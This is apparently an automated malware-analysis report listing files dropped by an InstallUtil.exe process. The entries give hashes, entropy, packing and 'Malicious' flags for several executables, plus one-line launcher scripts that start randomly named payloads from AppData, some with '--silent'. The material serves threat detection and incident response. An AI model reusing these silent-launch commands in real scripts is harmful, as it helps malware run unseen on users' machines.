Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684806772260995
Encrypted:false
SSDEEP:49152:lnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHa:8WqlkLESgCRE/vhOjb05efd6e/oXHa
MD5:786132EEAAB5CA2D987FFAB04D074173
SHA1:8CCD0F737D5FE8FEC7B96E9E92C5BCBFC6484C20
SHA-256:530C85F2502C14D5140D958BD0515638AF1CB38C04C86FA4DEEAFE6BD8B97511
SHA-512:1982343FF26A4C24911CCAF905415597C8B6FC5115DB78807310C596695E163C4D58400CA0A93A9C8F94E02C2D5BEAFCCF347CBE6E4B15503117D16E7055E106
Malicious:true
Reputation:unknown

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684771261859815
Encrypted:false
SSDEEP:49152:FnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHE:cWqlkLESgCRE/vhOjb05efd6e/oXHE
MD5:3C75E585255021AE084FD75240484292
SHA1:D15CE968C04EC6D6EA5DC0EBA56CF3B734E48649
SHA-256:45D15D98B8A5F60A5EE36967677E1A6554425C160A07584D9A1736FB7E9C5A3D
SHA-512:0E25CDD738C2A373C001B8EEA0A057952375269140AF931EEB9E60EA3847872B356B123B4F380055253DF550B13043B08052FB863B55485E3BFBBEA8A81168C9
Malicious:true
Reputation:unknown

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684810593398215
Encrypted:false
SSDEEP:49152:BnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHN:IWqlkLESgCRE/vhOjb05efd6e/oXHN
MD5:62C35A470D7DEB3AA4D433FB19C5E7F0
SHA1:E87FC235E15F027B34893EF41B2BDD6A4E0FD15D
SHA-256:19C92B60CEC2C7B8F506462524ABDDE7243D12A7E37A7D3DCB49BA0EE8F8D7BF
SHA-512:F32826BCF3ED95CDE1FBBD2321AABFAE497E3DE10071C915BDCD80B3F49FDA8553BA0846372D2A1F857F03C0194827B57FFCCADB38F861C8DF499BE8534BE7FA
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684793872606654
Encrypted:false
SSDEEP:49152:3nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHi:CWqlkLESgCRE/vhOjb05efd6e/oXHi
MD5:B4CEF398C7001044330BE058549F9DE3
SHA1:9A5D2F59C06849BF7CF80A12E4FEF6FC1605234C
SHA-256:568F948A3289967E02C0524A5FEA70BE37B1208C1429B37CED3B316193345FDC
SHA-512:E6E27836E2D84DDC14B5DB7090C4C0CCA5FC4988FB3E9E47A27F9E52AD7B349E69E73EFF7B7DEB4472FEA6CF307820950CDE7FA69BB65801B6CFC71561B9F960
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.869626725541007
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5dAkM0C/REln:fE1wkn2384
MD5:00542619821A482E2484D3F63C078D17
SHA1:2A0378ECBF2DE7FD26149A395D3D26D226497944
SHA-256:65CEFCC23B5ECED7C102705E50C0D4B8A743AAA66BA094644B2A8F943004D5F2
SHA-512:54DCE134CDE9C32E2C773802A6EA15F95F40982822123CCDDDAC9E2D4C8C743F286DE1C3BCDA30C4B6F9EF19BF7DFA84FFB63803F0CFBB73E6EB4044EAA68E40
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\xeTqrcoVoAXPGcrKwbOVfhy2.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.905716942869604
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5SYjPi2v:fE1wkn23Sfs
MD5:59F7C52A9F6027EA2F2531B2DB49B748
SHA1:25D87ACBC21AD5E4B1BF94360D937D6104729033
SHA-256:378034A7E5A738C086C8CEE9224630C79C563A193EC4EA545CEC03EC8C01A330
SHA-512:C885DC15D60E18D971C59AAA18B0C4BDBA0A2D5D20BB0433EE0D8ADCBDB8459774E3DEF25C71BEB2A865D87597D9A2D379D9DACCF64B2E72A5C3DB05F877B4EE
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\wG39L1YVzQJEnjZnGjsxQPIL.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.8300996263592575
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5NRoEN1BEMsULNSkdan:fE1wkn23DFB31LNSD
MD5:C2D21EA7C463FAC3F9AE11C050DE935E
SHA1:F55DAA9190E216170628E6ED0F4AD7DA3F29E118
SHA-256:76114212E85D53EE470BB24743BCBE2CFB7202FA2E8938415F6FCE54D1B7EDF1
SHA-512:E7664B3F6306EED202D1B57ABB964AD9C47A0B2E9F2E2EC1EAF3175F8BE025E8E4A002B72A2061BBB8EBBD2998122DD3E0ACEC182F7F2047B6F533805CFB286F
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\htMajCePjPdapCkAov1lc8J9.exe" --silent --allusers=0
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.985568754526514
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5rHS0Ux71ETJl:fE1wkn23bStxitl
MD5:CADAA6DC1EFC3D85BC1661F1D3D48BE2
SHA1:BB9119B1133B0CECD551CE80EDC8B4179E6A8B2B
SHA-256:8972EBE6A22E2B70DD46A5782028D40E2C8AEC03C7A0BBF1FEE74D829BA25E62
SHA-512:B0D4B53C79CDDDB004B618C3C415077069337A358BE7B34D8B154C41A8DCFEA6E3C1725E4BDB07567AC5BA5FFCA76294CB56FC67E9ED6714EB5BC99CFD10B1AD
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\NqsfoMYypS05t81TJmKPA8xv.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.825039002236954
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5kcfCjLjkA4Eykdan:fE1wkn23kuCSEyD
MD5:A2D9BF55162A6CB45A39D6F27490A683
SHA1:395AE5D47E226EED890B12898FE5D904FC53C47B
SHA-256:49662BD278937B1333ABB290185E33D3E42B42D62FC81F5B3BDECD06506C206E
SHA-512:C2FF4AF80292E832499C26E125B6997DE1B316C05638C2CA8A609F2DB8410BD7F93984E743A7BE9C9A1E8C808A5A7542A01C165108461269552B9D9095F0870D
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\AdDlHuzgF8lFUsmxcjVFtutw.exe" --silent --allusers=0
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.950925862851686
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DXyCvYsXRsLv:fE1wkn23Ly/2y
                                                                                                                                                                                                                                MD5:8123D87096D688A37AB37537AA691871
                                                                                                                                                                                                                                SHA1:095899F5A516ABAB6D4A5CAD25627C8036C6F61B
                                                                                                                                                                                                                                SHA-256:2F5C925CE12E8930BC417A4C11C0BB4E71FFB746FBEEDD942BE9242C0E795591
                                                                                                                                                                                                                                SHA-512:2935297549984CEA3F71C1BA731C2124658623CFA9BB104A122A136D230547563300789C8CE086A2156B93AF147897803B9D85F9BAFF08352E8FC6E330D3FD4A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\f2hw2VKIAGcHQqAtIrjN8igU.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.066867891837192
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5SLnQrl99Lw4m:fE1wkn23ST4Rw4m
                                                                                                                                                                                                                                MD5:241BDD5724B5584F07F514210EEAC753
                                                                                                                                                                                                                                SHA1:E68BF52974D26E280956FC50F14D0A3B19670F0D
                                                                                                                                                                                                                                SHA-256:7DFD41489C6B054D1844B85B40009F48E12A32D102625822D30C50A9E0E70C1D
                                                                                                                                                                                                                                SHA-512:15C5A5B89C287A107ACC1252951E2D34938A926D67C1994F2580DF4D69E7C391960B93B9F742219962F7E4D349AA6334161656DA2599838964418622D1C4BD43
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\7nBui7yHWFndJbxXyvMi3Z9f.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.0035382418621825
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WzhRQDdWHRn9NNlIkdan:fE1wkn23WzhUmn9PSD
                                                                                                                                                                                                                                MD5:67E36149535C8A8C09461B3E1EE53522
                                                                                                                                                                                                                                SHA1:D53E42D5DCAD3A91D7D5E1D57BB53C16D98A365A
                                                                                                                                                                                                                                SHA-256:1811C6F798FAEC87F364E47B24F99695438B16B0496AA730F8436DC856C8FCD8
                                                                                                                                                                                                                                SHA-512:510652666C99F7F4F90F5BADF3536757D7D633B3C39F7CCEFE17FB889370774C5E3249BF33757A2DCE7BACF22E2C6901BDE415FFA18E30993AB162FC9C9FBFA2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\sI7dZrzWguf80YTd4w1tJlxT.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.802162638119942
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5CZR0SvZAdiFn:fE1wkn23CZR05m
                                                                                                                                                                                                                                MD5:ADC59C16D8DD836094981119D4BD9AE3
                                                                                                                                                                                                                                SHA1:F1E80C9B703A88859A96EB2C9A7627F72C621495
                                                                                                                                                                                                                                SHA-256:6EC92CD045617B49575466F348B32089F1590C5D7CBC2F6CAE3AE23BBAED248D
                                                                                                                                                                                                                                SHA-512:9FFF75986DC086FC269BE4070F25A4E1550B9B4B6D818231AB9FDF1087FB1CC469802E35E92C213D6082FE95A6F301F75C729DFD670BCC2AD44C2E01CB9F798E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\gEy33b1wzb5JaeAUext9FbaV.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.829700819712553
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J50tbpiGO12As:fE1wkn230NM0v
                                                                                                                                                                                                                                MD5:020D843F8578F6B3C3C2AE94394E91FB
                                                                                                                                                                                                                                SHA1:B671C653A83FD919F38074B9F268900D35E644FC
                                                                                                                                                                                                                                SHA-256:49D034E00EA395FBDECDB629D327887D86682877ACDEF542A72CF395120660B6
                                                                                                                                                                                                                                SHA-512:C469F85DD6FFEDEC8663AF0682A75D00184F73146F1187484531CA136891AC2B8EBA9BAEF7F0C130268EB56852C975196B86D81CB0AB3A521ACE1ABC31838D7B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\QHmCOGrGcBV6cGjqniLiFdsr.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.071959208087219
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Tp2eBPy8kdan:fE1wkn23jD
                                                                                                                                                                                                                                MD5:E35B2F7C901715A3330B6734E7FFAF0F
                                                                                                                                                                                                                                SHA1:A39EA5CE0FE0159F705D0EFC4294C637274895DE
                                                                                                                                                                                                                                SHA-256:200BB4ADAD3D4948EE5FB5FE50F893836D4064583791074B25CEFE3125E27BA7
                                                                                                                                                                                                                                SHA-512:CA25B6C01713FA2E0B8D192405A10E4CE9184B4BBC96E8952C690A7824EFBD16B0F959F5AB55EB20E41375E5D9C083C547A4DCC16BEF7E5061D8DA48D4A9A01B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\vhpTjyAyaRSCIHDXWEzEV7G1.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.93470245011598
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5sYbyUZSldumn:fE1wkn23s85+dN
                                                                                                                                                                                                                                MD5:B1077B9413C7BBAC2C3E6FFCB72BBAFF
                                                                                                                                                                                                                                SHA1:96CEB8E9C75CDBC6A12E3BF6E5BA829735EF081E
                                                                                                                                                                                                                                SHA-256:BBF00A7FEC6BCF4777E84AB0CD2F05132B2905091E98D05F78A86D0BECB8D35D
                                                                                                                                                                                                                                SHA-512:EB218A64634E780A4768E1CD9A0EFE1BC23A6C0E5C0F49F92D94EA954F3482DD848BF9F458040B60975DC93529CF79789FC1B22FDACB220F435F41A1877F64D5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\IfzaP4WqQEdUcGlnXuUZNlcC.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.842088543948398
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5j22BB+dAl:fE1wkn23Z4dAl
                                                                                                                                                                                                                                MD5:87BB5AB061425884B4829F9A948A991C
SHA1:DE8E1D0BDA09FAEED4392A798053E35CB7DB7FC3
SHA-256:D79E7CD2C322C640DA978ED2D9AE7230782E690F7FF046E4576E6CB0EF0FBF51
SHA-512:0AADB583184EE0EBD478F21ADEC481BE100431474BEE6D18B4E4536919F6FE5455433A6788B3049F8A6CE51BA5B4AE4D7A241626986465E7526E74CF83BEBD7A
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\FIE2EI26EI4jGGv0xJtpXxXh.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.043539769019268
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5rZm4mCJln:fE1wkn23k4ll
MD5:6B979B9A5F5ADC5E75D5A8F5A8481826
SHA1:0328A85B5D24FE2EA042973C073B540BA7F21819
SHA-256:C640B2EB0A58FBC72DA427F16363B9D2EE8277922758109D418DFF88F8E05290
SHA-512:411B98C0F2DC37F9681D27BBC59E6598C7CE42D14FBA3F338F2F3D43BFE6017A4B3E592C8F4E29BB9C0B8B3C0761527698CE577945A555D57017FB2F8D01EAC4
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\NIrszCqD63mWfcibv0YdSwFl.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.731803899391344
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5XkuQrq1+ybkLACln:fE1wkn23041+yPs
MD5:AD1EAAF77E0BE5B1D200C867FA82D447
SHA1:2BE78F58B50929400D0648E1A635128561607BA7
SHA-256:3A5487F9079D1FEC5AB1ACFA6E51EFE35AD304557959F7C92583C5EC830BFF2E
SHA-512:CCD0B42CA535E32A4C8805EA34B96C914A1BBDBF063FA49BC1D9A6239B5667CDBE63D5E3B8932FFE4053AC50831C5CC44B8639CFCA8AD2208F7B1D5C260CB9BF
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\rE439KsrV4PvRPEPLReHeUKA.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.985568754526514
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5c0tOervJln:fE1wkn23c0bJl
MD5:A6F47C5157691D7B88DD5C986DCE6356
SHA1:331E925592A5EED9DB036224BA287C86AD50F9DE
SHA-256:5C848559CE662EE76D41E9B19C8750E67AAA41BB6CB7FFE12290BC9A2D349343
SHA-512:C32E3896E007806D02682D25232FCD56B6BD97DA592F6ED2028D1C1B3AC1399F2C73B60791640D9B34D55A77CCAF68C33599018DFB5C660CD2A2121F2BE5E056
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\9ufe1gHGCTbQcgch0LWJNHFl.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.806372696894626
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5BQSIE1WJGEgiT:fE1wkn23TInJGYT
MD5:C20D38EF2AEC0DC7D1CF578CE449A669
SHA1:F1890D5FDFD4737000022FFFCA82A44FEEBBB3C8
SHA-256:4784313143A861B5FD0C35168263B3F3240300BC1E0A25E839C445FD6ED95C05
SHA-512:3271F3368461E775D3B9DFB36E4044EEF4618E1C9C35119E3538465AD5AFF986D9E148A7FE7D386202E052B24798C74F27DA25D9FC41E7811BDB35EFFC164AC8
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\d5GRgSmaPslr3qxE59r0Grrj.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.951300233126509
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5AMYLHHUCOSc0s:fE1wkn23A9LnUC+L
MD5:F4476535F053EC7696330B81E14E2DC9
SHA1:58F53EF1A69C0467F4CC69857DC9F3B291F45277
SHA-256:8F12F8BD2903C8899CEF4F4917A059CF37B448CFB60510B2CA1FE5DAFFBFFFFC
SHA-512:0C7712A46CDD7FF4D1C38E99B1E6B2A7E04633CC37273B7F5221F87460C341AC36197ABC653B59B6512B98DB890DC181C3424ACBCCAD7AF7073CC795B0B8C1BD
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\eyAi0JyfnnbOWWs1ZPEHdG7y.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.764999465412405
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5t1PRtWBkpgn:fE1wkn23HPRt1pg
MD5:E83C7809992CE380BE5D03E8C226D04F
SHA1:F130B07297C078EE1F69CF36CCA1C09C5BD366C7
SHA-256:698E8152271BC32DF16A88177AAA7F9901F8C7D3442F514CD3EA301A88C35576
SHA-512:13990CB0110DC015FA420B1CD75569351278F672B973792C53CA5A71FF31474F5D35206BAD6DFAE46E2ABDED850689F1DC02F56AE05FCEAC74FA3228EBEC3E62
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\HPykbtSofo4ieesmLEyEOoa7.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.958030572933904
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5WNGsXqTh:fE1wkn23WNGF
MD5:83E90E2350B0450EF8D4410E52CC1B2E
SHA1:83D7E01FBCE17731B989465989C2F889DDEDD56D
SHA-256:35212B688252AE0163529F192BA1E6DD11DA61995FB0D6F0EDA8C2C20E2DF460
SHA-512:598FE754C6D4CDDF04009FF39CEDEAB8FA4279C98404EB72C7215CCE7A482A6DFA5381859A1F29DA4EA01B989A6B2DC81D5DDC61C0A28BCBCF6697B8C24BA1C0
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\30eZAb709eOPYHi1pUuH6yc8.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.968970971515983
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5cxtA/J1n:fE1wkn23cxtAJ1
MD5:8D75173387E0BF2F2935F70E5C15C6CC
SHA1:FDB42DDADB411EF6D41653BAA263C0740F90E3F5
SHA-256:1DDFEB3937C5AB349EE2A96B70A55B175107C71A13E7DAFE719EE94ACB920FA3
